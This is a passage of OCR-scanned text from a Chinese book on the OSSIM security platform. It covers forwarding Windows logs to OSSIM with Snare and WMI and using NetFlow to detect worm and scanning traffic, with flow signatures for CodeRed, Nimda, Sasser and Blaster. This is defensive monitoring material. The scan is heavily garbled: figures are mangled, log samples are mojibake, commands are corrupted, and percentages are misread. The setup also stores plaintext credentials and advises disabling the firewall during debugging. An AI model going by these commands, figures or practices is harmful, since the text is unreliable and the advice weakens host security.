@ Allow SNARE to automatically set audit configuration? ( 允许 Snare 设置 为 自动 审核 配 
置 功能 

€ Allow SNARE to automatically set file audit configuration? ( 允许 Snare 设置 为 自动 文件 
审核 配置 功能 ) 

€ Enable active USB auditing?(This option requires the service to be fully restarted) ( 启用 
USB 审核 功能 ?该 选项 需要 重启 服务 ) 

€ Enable SYSLOG Header? (启用 Syslog Header 功能 ， 完整 Syslog 消息 包括 PRI. 
HEADER 和 MSG， 有 些 情 况 下 HEADER 可 能 没有 ， 这 里 指 强 制 加 入 HEADER ) 


SYSLOG Facility 和 Priority 也 为 必 选 , 他们 包含 关系 见 表 7-9 所 示 , 另外 , Overrid detected 
DNS Name with 和 enable active USB auditing 为 可 选项 。 


表 7-9 Facility 和 Priority 内 容 对 比 


User 


[vai | Emergency 
Alert 


Critical 
Error 
L 


SYSLOG Facility p SYSLOG Priority Warning 


rm 

ps 0 y Notice 
Information 
Debug 
Dynamic 
[p 0 0 | 


Local 0 ~ local7 


首先 ， 要 确保 Snare 管理 为 打开 状态 (在 Windows Vista 以 上 系统 ， 使 用 要 注意 以 管理 员 
身份 运行 ， 和 否则 会 出 现 启动 错误 )， 在 浏览 器 打开 http:/localhost:6161/ 地 址 ， 选 择 左 侧 菜单 的 
Network Configuration 选项 。 

然后 在 “Destination Snare Server address” 地 址 栏 填写 OSSIM 的 地 址 ， 目 标 端 口 为 514。 
这 时 就 可 以 在 OSSIM 控制 台 上 接收 到 Windows 服务 器 发 来 的 日 志 了 。 配置 完毕 ,在 左 侧 选择 

“ Apply the latest Audit configuration” 菜 单 ， 并 单 击 “Reload Settings ”按钮 ， 重 新 加 载 设置 。 

最 后 ， 在 OSSIM Sensor 上 启用 Snare 插件 (参考 插件 配置 图 7-19)。 

操作 举例 ， 配 置 Windows Snare 日 志 步 又 如 下 : 


(1) 在 Windows 客户 机 上 安装 并 配置 Snare, 这 里 假设 OSSIM 服务 器 卫 为 192.168.150.20， 
主机 名 为 alienvault。 
(2) 在 主机 alienvault 上 修改 /etc/hosts， 添 加 Windows 主机 名 和 IP. 的 映射 。 
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(3) 当 Windows 上 的 Snare 装 好 后 ， 在 Alienvault 中 重启 Agent 进程 。 


(4) 打开 /etc/ossim/agent/plugins/snare.conf 配置 进行 验证 。 


确保 snare.conf 存储 的 日 志 在 /var/log/snare.log 文件 中 (默认 的 location 为 /varlog/syslog )， 
如 果 没 有 自动 创建 snare.log， 将 创建 文件 选项 由 false 改 成 true， 即 create_file=true。 


(5) 新 建 配 置 文件 /etc/rsyslog.d/snare.conf， 加 入 以 下 几 行 内 容 。 


重启 Rsyslog 服务 。 
etc/init.d/rsyslog reload — 0l 


在 Windows 客户 端 导 入 注册 表 文 件 ， 稍 等 片刻 后 再 查看 snare.log， 即 能 收集 到 日 志 ， 实 
例如 下 : 


为 了 调试 需要 ,建议 大 家 在 OSSIM 服务 器 端的 命令 行 下 监视 所 有 发 往 主 机 192.168.150.20 
514 端口 的 数据 包 ， 操 作 如 下 : 


除了 Snare 工具 以 外 ，evtsys 这 款 工具 也 可 将 Windows 日 志 发 送 至 Syslog 服务 器 。 还 包 
括 NTsyslog, 它们 都 能 以 系统 服务 的 方式 运行 , 都 具有 软件 小 巧 、 运 行 高 效 等 特点 。 有 关 Snare 
的 更 多 内 容 大 家 可 以 到 http://www.intersectalliance.com/ 网 站 中 继续 学 习 。 在 SIEM 控制 台中 查 
看 收集 到 Windows 日 志 如 图 7-42 所 示 ， 在 RawLog 中 查看 收集 到 的 windows 日 志 ， 如 图 7-43 
所 示 。 
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DATA SOURCE iD. 


iex Operating System a y 
SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT PROTOCOL 
0006 o coso o Te 
UNIQUE EVENT os assets +0 mionmy RELABILITY Risk 
ch111e3 aca 000e:2909. 609307403872 ES E 1 s 
USERDATAZ USERDATAS 


USERDATAY 


Mar 16 10:23: wanax wownEven 
23500090476 Se9e2cScbtete 28. te [Adm resriran sere 


TS Mar 16102332 


Securtyton 120 tsun Mar 16102332 291 aspi agn Secret TAdm 
T User Success Audited TWINZKaO; 1 Detaled. 
Name: 


Hoctet Wme Detaled Po haa ed Pues ess pe 612 User vede NOV G01 TA process has ented: process 10: 612 User 
SIEM me: Adminstrator Domain: WIN2K Lopon ID (23875) #01 11A fisrator Domain: WIN2K Lapon 1D. (000x8734) #01114 
SRC USERNAME & DOMAIN SRC HOSTNAME SRC MAC DST USERNAME & DOMAIN DST HOSTNAME DST MAC 
10M 
-py empy empty 
SOURCE ADDRESS proRTY RELABUTY acm DESTINATION ADDRESS proar RELIABILITY Acn 
REPUTATION 
0002 9002 
Event Context information is not availabe. 
CONTEXT 
Kog 
yh011Ndminintr, 
RAWLOG or Do 


201403.16155303 syslog alervault 009.0 


EVENT TYPE 


Sysop: syslogentry 


图 7-42 ”收集 到 Windows 日 志 


Mar 16 15:53:03 MY-PC Security Auditing: 5447: AUDIT SUCCESS &aring;&midcot &sup? ael. 
igA155 Aacute aelig A4 145/8supl; Windows &ccedil &ihy Mf 155;&eacut ejb£1 28,44 37;&aring;dsup 
Vksupi;daring; át 143,4deg ;accedil ashy.&4 55;deacu te,6128,44137 Garing: bal 


0000 b 


EVENT DETAIL 


Mar 16 15 53 03 MY-PC Security Auditing 5447 AUDIT, SUCCESS &aring &middot &sup2 &aelip bacute Baellgr &sup! Windows &ccedil &shy keacute€%s Baring &su 
pl &sup3 karing &deg &ccedil shy &eacutetye karing™ &umi &atidet, &auml &cedil &raquo &eacute &cent” Karin breg baring. bumi ib S Ts p^ ke 


fi tashe &m Kot baring cedi Asect Bdeg NT AUTAORITYLOCAL SERVICE Begrave quest Bccedl umi &aumi ES ec ae urac epi Lies 
&ccedi Lun. D 1588 harlig tauml&facié ccedi Bum baring Borim Baum Mquest ierg dadig Amarr D DECC AEST A34 EE VESFBAAEUF3DGD) barin 
mac &aelpp &acute kelig” ksup! &ccedi &plusmn &raquo. 


Accedi sect Bdeg Microsoft Corporation &aeli bacute Bachg sup! Laur Biquest lec ael 
S0 &eacute" Bcurren &ccedil &shy &eacuteNe &aring™ &um| Lauml kiquest Siexd &aelig Bmacr ID {DBBDE651 


ingk annt Bri t 147 ADBEAT2CETEGIOECS 
030} Barng tcedi &sec Bdeg Seded CMP VS Out bctedi 8pusmn &raguo Baring beicuet &aeig Bdeg cedi haum sup! y 


7-43 在 RawLog 中 查看 收集 到 的 Windows 日 志 


7.17.3 ”通过 WMI 收集 Windows 日 志 


Microsoft Windows 


管理 规范 ， 简 称 WMI。 通 过 企业 网 络 为 访问 和 共享 管理 信息 主动 建立 


标准 WMI 提 供 程序 在 WMI 和 操作 系统 和 应 用 程序 之 间 充当 中 介 角 色 所 以 可 以 通过 WMI 来 
检索 大 多 数 计算 机 系统 方面 配置 的 详细 信息 。WMI 提供 程序 主要 包括 以 下 内 容 : 


@ 
@ 
° 

志 设 置 等 。 
e 
e 


SNMP 负责 提供 对 SNMP MIB 数据 的 访问 ， 


为 开发 人 员 提 供 硬件 类 、 系 统 类 和 进程 管理 类 的 类 库 。 
安全 提供 程序 ， 主 要 用 户 安全 设置 (所 有 权 、 审 计 和 访问 权限 ) 。 
事件 日 志 提供 程序 ， 提 供 对 Windows 事件 日 志 的 访问 ， 例 如 读 取 、 备 份 更 改 事件 日 


能 计数 器 和 监控 器 提供 程序 ， 负 责 读 取 、 写 入 及 监视 。 


并 从 SNMP 托管 设备 获取 信 ， 


首先 确保 在 Windows 下 WMI 服务 是 启动 状态 ， 然 后 在 Windows 开始 菜单 的 命令 行 中 输 
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入 “DCOMCNFG” 命 令 调 出 组 件 服务 ,然后 依次 单 击 控制 台 根 目录 一 组 件 服务 一 计算 机 一 我 


的 电脑 ， 最 后 在 “我 的 电脑 ”上 右键 单 击 属性 ， 单 击 “COM 安全 ”标签 ， 然 后 再 启用 和 激活 
权限 栏目 ， 单 击 编辑 限制 ， 如 图 7-44 所 示 。 


*€»IzEIXcS3IMEJ SIE um 
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Z cows mH 
T 
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à Eg ee eee pe mre e. 


5 
E Baum c o —I 
mac | 
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NATI d j 
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744 设置 WMI 


成 功 添加 wmiuser〈 事 先 添加 该 用 户 ) 用 户 后 ， 即 完成 了 Windows 系统 上 的 设置 工作 。 


7.17.4 配置 OSSIM 


在 OSSIM 系统 中 安装 了 WMI 插件 后 ， 需 要 在 Windows 做 好 相应 设置 ， 刚 才 我 们 已 经 完 


成 ， 下 面 还 要 对 OSSIM 的 配置 文件 做 一 些 调整 。 


首先 在 /etc/ossim/agent 目录 下 创建 wmi_credentials.csv 文件 : 
#vi /etc/ossim/agent/wmi credentials.csv 


然后 添加 若干 台 Windows 计算 机 ， 包 括 IP 地 址 用 户 名 称 和 密码 ， 格 式 如 下 : 
192.168.150.10,userl,pass 
192.168.150.11,user2,pass 


本 实验 在 Windows 域 环境 下 出 现 过 某 些 Windows 机 器 无 法 发 出 日 志 的 情况 , 建议 大 家 使 
用 工作 组 内 的 Windows 机 器 ， 而 且 别 忘 了 在 调试 期 间 ， 关 闭 Windows 防火 墙 。 


436 


最 后 开始 激活 WMI 插件 ， 方 法 如 下 : 


(1) 执行 ossim-setup。 

(2) 选择 第 3 项 Change Sensor Settings。 
(3) 选择 第 3 项 Select detector plugins。 
(4) 选择 wmi-application-logger。 

(5) 选择 wmi-system-logger。 

(6) 选择 wmi-security-logger。 


第 7 章 OSSIM 日 志 收集 与 分 析 


CD 保存 并 退出 ， 紧 接着 系统 启动 ossim-reconfig 开始 重新 配置 系统 。 
(8) 重新 启动 代理 进程 /etc/init.d/ossim-agent restart. 


很 快 就 可 以 在 SIEM 中 收 到 标记 Snare Windows 的 日 志 了 。 


这 条 命令 的 含义 是 检查 代理 是 否 收 到 日 志 。 接 着 在 Windows 系统 下 输入 : 
© CiVwwmic -U<user>$<pass>//<192.168.150.20>"select * from win32 Process" — 


其 中 wmic 是 Windows 管理 规范 的 命令 行 工具 ， 最 早 随 Windows Server 2003 发 布 ， 这 条 
命令 的 含义 是 检查 与 Windows 机 器 是 否 连接 。 


(tall -f /var/log/alienvault/server/server.log 0000 
这 条 命令 用 于 检验 服务 器 是 否 收 到 日 志 ， 我 们 可 以 在 Web 界面 查看 配置 情况 ， 如 图 7-45 
所 示 。 
we os [we] 


WMI Tasks Displaying 1 to 1 of 1 tasks 

局 New |j Mody i} Delete selected | Apply 

Title Sensor Credentials Frequency Enabled 

| 
图 7-45 Web 下 配置 WMI 


7.17.5 Snare 5 WMI 的 区 别 
我 们 知道 Windows 系统 的 图 形 界面 非常 强大 而 且 易 用 ， 但 是 图 形 界面 需要 较 大 的 资源 消 
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耗 ， 使 得 一 些 系 统 维 护 人 员 不 太 满意 ， 所 以 微软 开发 了 WMI， 在 其 中 的 Resource Kits 提供 了 
大 量 基 于 WMI 的 脚本 供 管理 员 使 用 ，WMI 通过 RPC 调用 访问 Windows 系统 的 原始 数据 ， 所 
以 WMI 对 Windows 系统 支持 得 最 好 ， 获 取 的 日 志 信息 也 最 完整 。 

前 面 介绍 过 在 UNIX/Linux 和 一 些 路 由 器 交换 设备 上 会 产生 大 量 日 志 信 息 , 并 以 syslog 的 
形式 存在 , 打 个 比方 这 个 syslog 日 志 协 议 ,可 以 告诉 管理 员 谁 (Facility), 什 么 时 间 (Timestamp)， 
什么 地 方 (Hostname) 做 了 什么 事情 (Message), 以 及 这 个 事情 的 重要 性 (Severity)。 在 Windows 
系统 中 没有 使 用 syslog 协议 去 收集 日 志 ， 因 为 它 有 自己 的 日 志 协 议 Event Log。 

Snare 是 一 个 代理 程序 ，Snare 可 以 将 Windows 事件 日 志 转 发 到 syslog 服务 器 中 ， 并 且 它 
没有 32 位 和 64 位 之 分 ， 它 将 Windows 日 志 转 发 到 OSSIM 系统 的 syslog 服务 上 并 由 它 接收 。 
不 仅 是 OSSIM 系统 利用 WMI 收集 Windows 日 志 ，Splunk、ManageEngine Eventlog Analyzer、 
Sawmill 等 日 志 分 析 系 统 亦 是 如 此 。 


小 结 
本 章 详细 介绍 了 常见 日 志 格 式 以 及 收集 标准 ， 并 分 析 了 路 由 器 、 交 换 机 、 防 火 墙 常见 网 络 


设备 的 日 志 ， 除 此 之 外 还 详细 讲解 了 Linux 平台 下 Apache、Vsftp、Squid、DHCP 等 应 用 服务 
日 志 的 日 志 分 析 ， 最 后 讲解 了 OSSIM 中 Snare 和 WMI 收集 日 志 的 流程 和 方法 。 
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cB 8 
< OSSIMifise 


从 本 章节 可 以 学 习 到 : 

用 NetFlow 分 析 异 常 流量 
NetFlow 输出 格式 与 保存 方法 
Ntop 流量 采集 方式 
Ntop 流量 分 析 方 法 
Nagios 原理 

Nagios 监控 方法 
Nagios 插件 

第 三 方 监控 软件 集成 
硬件 监控 


用 NetFlow 分 析 异 常 流量 


目前 主机 的 异常 流量 主要 由 以 下 几 类 行为 所 造成 : 


(1) 网 络 蠕虫 、 病 毒 


现今 网 络 病毒 和 蠕虫 的 传播 ， 导 致 网 络 带宽 下 


(2) DOS 和 DDoS 攻击 


或 主机 和 网 络 设备 资源 的 极 大 浪费 。 


拒绝 服务 攻击 流量 巨大 ， 常 常会 破坏 主机 或 网 络 的 可 用 性 ，DOS 攻击 常 使 用 异常 的 数据 
流量 冲击 主机 或 网 络 设备 , 尤其 是 分 布 式 拒绝 服务 攻击 可 以 控制 多 台 主 机 同时 发 起 攻击 , 造成 


Beh HERAN o 
(3) 其 他 入 侵 引 起 的 异常 流量 
除了 蠕虫 和 DOS 攻击 外 ， 还 有 Shellcode Jii 


量 , 这 类 异常 更 不 好 查找 。 不 同 的 入 侵 行为 会 具有 不 同 的 


等 ， 使 得 主机 的 实时 流量 呈现 多 维度 的 特点 。 
这 些 流量 可 以 使 用 NetFlow 分 析 异 常 流量 
协议 分 布 ， 与 传统 基于 SNMP 的 监控 工具 Cacti、 


常 流量 .NetFlow 流 


得、 缓冲 区 溢出 CARP) 攻击 等 引起 的 异常 流 
异常 流量 特征 ， 如 突 发 性 、 小 概率 性 
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量 分 析 法 可 帮助 用 户 了 解 流量 构成 、 
Zabbix 所 不 同 ， 它 利用 Flow 技术 来 收集 网 


全 运 维 平台 一 一 OSSIM 最 佳 实践 


络 中 有 关 流 量 的 重要 信息 , 在 OSSIM 系统 中 集成 了 NetFlow 后 ,可 以 实现 集 流 量 收集 、 分 析 、 
报告 于 一 体 。 该 功能 和 OSSIM 中 的 实时 抓 包 分 析 形 成 了 有 利 的 相互 补充 。 就 好 比 一 个 病人 去 
医院 进行 验 血 、 拍 X 光 片 一 样 由 表 及 里 深入 到 内 部 查找 问题 。 下 面 首先 了 解 一 下 NetFlow 基 
础 知识 ， 为 更 深入 地 学 习 打 个 基础 。 

最 初 NetFlow 由 Cisco 开发 ， 由 于 使 用 广泛 ,目前 很 多 厂家 都 可 以 实现 类 似 NetFlow 的 功 
能 ， 如 : Juniper、Extreme、Foundry、H3C。 对 于 Cisco 来 说 ，NetFlow 有 多 种 版 本 ， 如 : V5、 
V7、V8、V9。 目 前 NetFlow V5 是 主流 。 因 此 本 文 主要 针对 NetFlow V5。 首 先 从 流 (Flow) 
讲 起 ， 一 个 IP 数 据 包 的 Flow 至 少 定义 了 下 面 7 个 关键 元 素 : 

源 IP 地 址 ; 

目的 IP 地 址 ; 

源 端 口号 ; 

目的 端口 号 ; 

第 三 层 协 议 的 类 型 ; 
TOS 字段 ; 

@ 网络 设 备 输入 /输出 的 逻辑 端口 。 

以 上 7 个 字段 定义 了 一 个 基本 的 Flow 信息 ， 不 过 Cisco 的 Neflow v5 版 本 中 还 包含 了 AS 
字段 在 OSSIM 系统 中 集成 了 一 款 基 于 Web 的 NetFlow 分 析 工 具 , 其 中 也 是 通过 收集 NetFlow 
中 的 以 上 这 些 信息 来 分 析 流量 从 而 判断 故障 。 

当前 还 可 利用 NetFlow 或 sFlow 当中 的 一 种 ， 所 不 同 的 是 ，NetFlow 是 一 种 基于 软件 的 技 
术 ， 而 sFlow 则 采用 内 置 在 硬件 中 的 专用 芯片 。 这 种 技术 减轻 了 路 由 器 或 交换 机 的 CPU 和 内 
存 的 负担 。 无 论 是 NetFlow 还 是 sFlow， 都 可 以 在 无 须 部 署 探测 器 的 情况 下 ， 帮 助 网 络 管理 员 
更 深入 了 解 网 络 传输 流 。 


8.1.1 流量 采集 对 业务 的 影响 

采用 NetFlow 方案 处 理 从 某 个 接口 接收 到 数据 包 , 用 来 对 被 监控 路 由 器 进行 流量 分 析 的 数 
据 来 自 NetFlow 数据 从 路 由 器 送出 的 非 采样 NetFlow 数据 不 到 流 经 该 路 由 器 数据 量 的 1%， 使 
用 采样 NetFlow 时 数据 大 为 减少 。 根 据 计 算 ， 在 采样 率 为 1000:1 时 ， 对 10Gbits 的 流量 进行 
NetFlow 分 析 , 约 产生 1.3Mbit/s 的 流量 。 因 此 ，NetFlow 产生 的 这 部 分 流量 对 于 骨干 网 的 带宽 
占用 很 少 。 

利用 NetFlow 技术 实现 流量 监测 需要 路 由 器 打开 NetFlow 协议 , 以 配合 采集 数据 。 因 此 会 
对 路 由 器 的 CPU 造成 一 定 的 负担 。 根据 Cisco 公司 的 “NetFlow Performance Analysis” 白 皮 书 ， 
在 非 采 样 方式 下 ， 路 由 器 打开 NetFlow 后 ， 其 CPU 使 用 状况 如 下 : 


€ 如 果 有 10000 条 同时 在 线 的 Flow， 则 路 由 器 的 CPU 使 用 率 平均 增加 7.0496; 
€ 如果 有 45000 条 同时 在 线 的 Flow， 则 路 由 器 的 CPU 使 用 率 平均 增加 19.0696; 
€ 如 果 有 65000 条 同时 在 线 的 Flow， 则 路 由 器 的 CPU 使 用 率 平均 增加 21.0896. 
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这 些 数据 是 基于 不 同 的 产品 系列 进行 测试 的 平均 值 。 

在 采样 方式 下 打开 NetFlow 对 路 由 器 的 CPU 影响 会 更 小 。 根 据 Cisco 公司 的 资料 显示 ， 
在 采用 100:1 的 采样 率 时 CPU 使 用 率 仅 增加 3%。 在 不 同 的 采样 率 下 ，CPU 的 负担 增加 程度 
也 不 同 。 


8.1.2 NetFlow 的 Cache 管理 
在 NetFlow 中 有 两 个 关键 组 件 : Cache 和 Expert。 


(1) NetFlow Cache 主要 描述 流 缓存 是 如 何 存放 在 Cache 中 的 。 
NetFlow 缓存 管理 机 制 中 包含 一 系列 算法 ， 能 够 有 效 地 判断 一 个 报 文 是 属于 已 存在 Flow 
的 一 部 分 ， 还 是 应 该 在 缓存 中 产生 一 条 新 的 Flow。 这 些 算法 能 动态 更 新 缓存 中 Flow 的 信息 ， 
并 且 判 断 哪些 Flow 应 该 到 期 终止 。 
(2) NetFlow Expert 主要 描述 流 的 输出 机 制 ， 也 就 是 如 何 输出 并 被 分 析 器 接收 。 
首先 了 解 NetFlow Cache〈 缓 存 机 制 )。 当 缓存 中 的 Flow 到 期 后 ， 就 产生 一 个 将 Flow 输 
出 的 动作 。 将 超时 的 Flow 信息 以 数据 报 文 的 方式 输出 ， 这 叫做 “NetFlow Export”， 这 些 输出 
的 报 文 包含 几 十 条 Flow 信息 。 


8.1.3 NetFlow 的 输出 格式 

NetFlow 的 输出 报 文 包含 报头 和 一 系列 Flow 流 ， 报 头 包含 序列 号 、 记 录 数 、 系 统 时 间 等 ， 
Flow 流 包含 下 地 址 、 端 口 、 路 由 信息 等 。 各 个 版 本 的 NetFlow 格式 都 相同 ， 且 NetFlow 采用 
UDP 报 文 ， 更 有 利于 大 流量 情况 下 的 报 文 传输 。 


8.1.4 NetFlow 的 采样 机 制 

在 NetFlow 的 实际 应 用 中 ， 它 使 用 采样 机 制 ， 通 过 使 用 采样 技术 可 以 降低 路 由 器 的 CPU 
利用 率 ， 减少 Flow 的 输出 量 ， 但 仍然 可 以 监测 到 大 多 数 流量 的 基本 状态 信息 。 当 我 们 不 需要 
了 解 网 络 流量 的 每 个 Flow 的 细节 时 ， 采 样 就 成 了 比较 好 的 选择 。 但 它 不 适用 于 计 费 系统 ， 因 
为 当 流 量 计 费 系统 采用 NetFlow 技术 会 造成 误差 。 


8.1.5 NetFlow 采样 过 滤 

多 数 异 常 流量 的 目的 端口 固定 在 一 个 或 几 个 端口 , 我 们 可 以 利用 这 一 点 , 对 异常 流量 进行 
过 滤 或 限制 。 传 统 方式 下 我 们 在 路 由 器 上 启用 NetFlow， 并 登录 该 设备 输入 如 下 命令 查看 ， 如 
果 是 长 期 的 数据 分 析 ， 这 种 命令 行 方式 不 便于 观察 和 分 析 故 障 。 如 图 8-1 所 示 。 
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GATEWAY#show cache flow 
IP packet size distribution (1149 total packets) 
1-32 64 96 128 160 192 224 288 320 352 384 416 
-134 .475 . - -666 .037 . -005 .691 .9684 .601 .662 


544 576 102 2 3584 4096 4608 
.eee .eei .e2 7. x oeo .666 .eee 


Switching 278544 bytes 
13 acti\ 4083 i ive，378 added 
7046 ager poll flow alloc failures 
Active flows timeout in 30 minutes 
Inactive flows timeout in 15 secon 

IP Sub Flow Cache, 21640 bytes 


13 active, 1011 inactive, 378 added, 378 
Ə alloc failures, 0 force free 
1 chunk, 1 chunk added 
last clearing of statistics nev 
Total Flows Pack kets Active(Sec) Idle(Sec) 
-- Flows /Sec Flow / Flow /Flow 
Tcp-w 32 8 3 8.1 
|TCP-other 24 . 2 14.4 
2 15.4 
14.7 


SrcIPaddres stIf DstIPaddress Pr SrcP DstP Pkts 


19.9.9. 1 10.255.255.255 11 0089 0089 
19.9.9.36 1 196.255.255.255 11 688A 968A 


图 8-1 路 由 器 上 查询 NetFlow 


而 在 OSSIM 系统 中 提供 的 这 种 图 形 化 的 NetFlow 模式 过 
图 8-2、 图 8-3 所 示 。 


滤 ， 不 消耗 路 由 器 系统 资源 ， 


EX s; 


extended v] ve 


FLOWS INFO 


图 8-2 OSSIM 上 查询 NetFlow 
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Flow Records 


soe : omo 
Tm 
lows © sat Top 
er 3 vj 
- sae Amy ron 
MLL SOURCES and (voee 
E um V ree v] v] 
ow ^ Orms 
FLOWS INFO. 
m 
PPS 1007 avc Erp 


图 8-3. NetFlow 数据 流 过 滤 


NetFlow 在 监测 恶意 代码 中 的 优势 


相对 于 传统 的 基于 Payload 的 恶意 代码 检测 方法 而 言 ， 基于 NetFlow 的 检测 方法 具有 如 下 

(1) NetFlow 数据 流 获 取 方 便 。 

(2) NetFlow 流 信息 没有 高 层 信息 。 在 OSSIM 的 SIEM 面板 中 出 现 的 基于 Payload 的 检 
测 方法 ， 由 于 需要 分 析 应 用 层 信息 ， 所 以 不 可 避免 地 会 降低 分 析 程序 的 处 理 效率 。 而 NetFlow 
并 不 包含 应 用 层 信息 ， 但 包含 三 层 信息 〈 含 三 层 协议 类 型 )。 虽 然 在 分 析 的 精度 上 有 所 下 降 ， 
但 是 使 得 分 析 程序 的 效率 大 为 提高 ， 尤 其 是 在 大 流量 环境 下 优势 更 为 明显 。 

(3) 现在 NetFlow 已 经 成 为 事实 上 的 标准 ， 而 且 OSSIM 提供 的 友好 的 图 形 化 NetFlow 
界面 ， 简 化 了 数据 分 析 难 度 ， 主 要 是 系统 通过 RRD (Round-Robin Database) 实现 可 视 化 ， 它 
将 数据 存储 于 RRD 数据 库 ， 然 后 生成 图 片 根据 进出 数据 按 端 口 、 协 议 类 型 表现 出 来 。 如 图 8-4 
所 示 。 我 们 可 以 显示 全 年 流量 ， 直 观 地 查看 流量 分 布 情况 。 
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NETFLOW 
DEWIS -wwvev GRAPH 
Profile: diwe 
w rm ser Profile info: 
Ie 
= Bax 
iilis! = slut z 
Anaia eic Ml sec 
m 
1 tstart 2015-02-06-11-35 
Fri Feb 6 10:35:00 2015 Flows/s any protocol 
tend 2015-03-08-23-35 


Feb 


Sleat [Eisa Vinin v timia [ique s 四 四 加 回回 
8-4 显示 全 年 的 NetFlow 流量 


8.2.1 NetFlow 的 性 能 影响 

我 们 知道 在 设备 缓存 中 Flow 的 生成 ， 需 要 消耗 系统 资源 ， 将 Flow 格式 化 成 特定 的 报 文 ， 
并 将 报 文 输出 ， 同 样 会 消耗 系统 资源 ， 因 此 在 设备 上 使 用 NetFlow 时 ， 会 牺牲 设备 性 能 。 由 于 
高 端 Cisco 设备 (如 6500, 7600 系列 等 ) 都 是 通过 ASIC 硬件 处 理 数据 包 , 所 以 占用 CPU 10% 一 
15% 利 用 率 都 是 正常 。 在 使 用 中 CPU 的 利用 率 随 着 缓存 中 Flow 条 目的 增 大 而 增加 ， 所 以 在 高 
负载 情况 下 ， 需 慎 用 NetFlow 功能 。 


8.2.2 NetFlow 在 蠕虫 病毒 监测 的 应 用 

前 些 年 Red Code, SQL Slammer、 冲 击 波 、 震 荡 波 等 病毒 的 相继 爆发 ， 不 但 对 用 户主 机 造 
成 影响 , 而 且 对 网 络 正常 运行 也 构成 危害 , 因为 这 些 病毒 具有 扫描 网 络 、 主动 传播 病毒 的 能 力 ， 
还 会 大 量 占 用 网 络 带 宽 或 网 络 设备 系统 资源 。 这 些 蠕虫 在 网 络 行为 上 都 有 某 些 共同 特征 , 我 们 
可 以 利用 NetFlow 筛选 出 带 有 这 些 特 征 的 数据 包 ， 从 而 发 现 问题 。 其 实 最 简单 的 检测 扫描 的 算 
法 就 是 看 某 个 IP 是 否 连 续 访问 某 个 IP 段 内 的 所 有 主机 。NetFlow 分 析 恶 意 软件 的 流程 如 图 8-5 
所 示 。 
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NetFlow 


图 8-5 NetFlow 分 析 恶 意 软 件 的 流程 


例 1: CodeRed 的 Flow 特征 是 destination port=80， packets=3， size=144bytes。 虽 然 在 
Internet 上 ， 符 合 上 述 特 性 的 正常 行为 是 存在 的 ， 但 是 一 般 正 常 使 用 的 主机 不 会 连续 发 出 大 量 
的 报 文 。 

因此 监测 CodeRed 可 采用 策略 是 : 取 几 个 不 同时 间 段 ， 例 如 每 段 时 间 5 分 钟 ， 如 果 每 个 
时 间 段 内 符合 特征 的 Flow 大 于 上 限 值 ， 则 可 以 判断 为 CodeRed 。 

例 2: Nimda 的 Flow 特征 是 每 个 Flow 代表 一 次 连接 destination port=80 (http) 的 行为 ， 
如 果 普 通 的 客户 机 在 一 段 时 间 内 例如 5 分 钟 内 ) Flow 数量 过 大 ， 那 么 很 有 可 能 遭受 病毒 感 
染 或 者 存在 其 他 针对 HTTP 的 攻击 行为 。 

因此 监测 Nimda 可 采用 策略 是 : 选取 几 个 不 同时 间 段 ， 间 隔 为 5 分 钟 ， 如 果 时 间 段 内 符 
合 特征 的 Flow 超过 上 限 值 ， 则 可 以 判断 为 Nimda 病毒 攻击 行为 。 


8.2.3 ”网 络 扫 描 和 蠕虫 检测 的 问题 

蠕虫 爆发 的 初始 阶段 会 对 网 络 主机 进行 扫描 , 进而 感染 更 多 的 存在 特定 漏洞 的 主机 。 所 以 
爆发 初期 蠕虫 在 流 特征 上 和 网 络 扫描 类 似 。 可 在 策略 中 定义 一 个 经 验 值 ， 当 每 个 源 IP 对 应 的 
符合 流 特征 的 目标 IP 多 于 这 个 经 验 值 时 ， 就 认为 这 是 扫描 流量 ， 将 源 、 累 计 扫 描 次 数 、 扫 
描 种 类 放 入 黑 名 单 表 ， 以 便 在 必要 时 ， 对 其 源 IP 进行 过 滤 。 

例 3: 震荡 波 病毒 (Worm.Sasser) 的 特征 是 一 个 IP 同时 向 随机 生成 的 多 个 PP， 发 起 445 
端口 的 TCP 连接 。 因 此 检测 条 件 是 : 相同 源 PP、 大 量 不 同 目的 IP、 目 的 端口 为 445， 当 符合 
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的 Flow 达到 上 限 值 时 ， 则 可 以 确定 是 震荡 波 病毒 ， 它 的 NetFlow 流 如 表 8-1 所 示 。 


表 8-1 震荡 波 (W32.Sasser.Worm) NetFlow 流 记 录 


2014-1-1 192.168.1.100 16.203.2.1 
14:10 

2014-1-1 192.168.1.100 1288 78.21.24.15 445 1 48 0 TCP 
14:10 

2014-1-1 192.168.1.100 2 56.203.24.91 
14:10 
2014-1- 
14:10 


192.168.1.100 163.57.156.13 


CP 


如 果 在 Debian 系统 中 安装 了 X-Window 图 形 环境 ， 那 么 可 以 安装 etherape (图 形 化 的 网 
络 状 况 监视 器 工具 ) 工具 ， 安 装 方法 如 下 : 

#apt-get install etherape 

Etherape 用 来 监控 蠕虫 病毒 。 图 8-6 所 示 为 蠕虫 扫描 445 端口 的 TCP/IP 连接 情况 。 


eo — pe I LLLA 


图 8-6 ”蠕虫 对 外 发 起 的 大 量 链接 
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CIFS 消息 一 般 在 Netbios EÈ TCP 协议 层 上 ， 分 别 使 用 不 同 的 端口 139 或 445， 目 前 倾向 
于 使 用 445 端口 。445 是 网 络 邻居 使 用 的 端口 , 如 果 有 计算 机 连接 445 端口 , 可 能 有 三 种 情况 : 
内 网 的 用 户 偶尔 连接 ， 估 计 是 想 访 问 共享 文件 夹 ; 内 网 用 户 频 繁 连接 445， 可 以 判断 对 方 有 病 

从 表 8-2 中 我 们 可 以 看 出 ，201.203.1.100 正在 对 网 络 IP 段 进行 135 端口 扫描 。 经 过 查证 ， 
这 是 冲击 波 CW32.Blaster Worm) 蠕虫。 


R 8-2 冲击 波 〈W32.BlasterWorm) NetFlow 流 记录 
时 间 源 IP 端口 ”目的 IP 目的 端口 “” 包 FË ba WA 


2014-1-1 
201.203.1.100 3221 201.203.2.1 
15:10 
2014-1-1 
15:10 201.203.1.100 3322 201.203.4.8 135 48 TCP 


2014-1-1 
15:10 201.203.1.100 3342 201.203.4.91 | 135 TCP 
2014-1-1 
15:10 201.203.1.100 3451 201.203.6.3 135 TCP 


例 4: 几 年 前 臭名 昭著 的 微软 SQL-Server 漏洞 造成 了 很 大 的 影响 ， 它 的 特征 是 目的 端口 
为 1433 的 TCP 流 。 表 8-3 是 根据 此 条 件 筛选 出 的 NetFlow 统计 数据 ， 可 以 看 到 IP 地 址 
66.190.144.166 正在 对 某 网 段 进行 SQL 漏洞 扫描 。 


